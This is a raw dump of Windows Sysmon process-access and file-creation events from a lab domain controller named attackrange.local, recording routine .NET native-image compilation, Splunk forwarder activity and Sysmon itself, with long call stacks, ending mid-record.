13:44:49.798{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90D1-6005-4601-00000000A301}3176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005481Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:49.783{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90D1-6005-4601-00000000A301}3176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005480Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:49.783{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90D1-6005-4601-00000000A301}3176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005479Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:49.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90D1-6005-4501-00000000A301}3088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000005478Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:49.376{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90D1-6005-4501-00000000A301}3088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005477Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:49.376{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90D1-6005-4501-00000000A301}3088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005476Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:49.033{59A5CD1D-90D0-6005-4401-00000000A301}47084804C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005475Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:44:49.017{59A5CD1D-90C7-6005-3E01-00000000A301}4688C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1250-0\System.Windows.Forms.dll2021-01-18 13:44:49.017 10341000x80000000000000005509Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:50.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90D2-6005-4B01-00000000A301}3504C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005508Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:50.908{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-90D2-6005-4B01-00000000A301}3504C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005507Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:50.908{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90D2-6005-4B01-00000000A301}3504C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005506Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:50.814{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90D2-6005-4A01-00000000A301}1156C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000005505Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:50.798{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-90D2-6005-4A01-00000000A301}1156C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005504Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:50.798{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90D2-6005-4A01-00000000A301}1156C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005503Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:44:50.736{59A5CD1D-90D2-6005-4901-00000000A301}3160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\c58-0\System.ServiceProcess.dll2021-01-18 13:44:50.736 10341000x80000000000000005502Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:50.611{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90D2-6005-4901-00000000A301}3160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005501Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:50.595{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90D2-6005-4901-00000000A301}3160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005500Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:50.595{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90D2-6005-4901-00000000A301}3160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005499Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:50.548{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90D2-6005-4801-00000000A301}3676C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000005498Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:50.548{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-90D2-6005-4801-00000000A301}3676C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005497Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:50.548{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90D2-6005-4801-00000000A301}3676C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005496Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:44:50.470{59A5CD1D-90D1-6005-4601-00000000A301}3176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\c68-0\System.Runtime.Remoting.dll2021-01-18 13:44:50.470 10341000x80000000000000005495Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:50.126{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-90D1-6005-4701-00000000A301}4936C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005494Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:50.126{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005493Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:50.126{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005492Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:50.126{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005491Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:50.126{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005490Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:50.126{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C: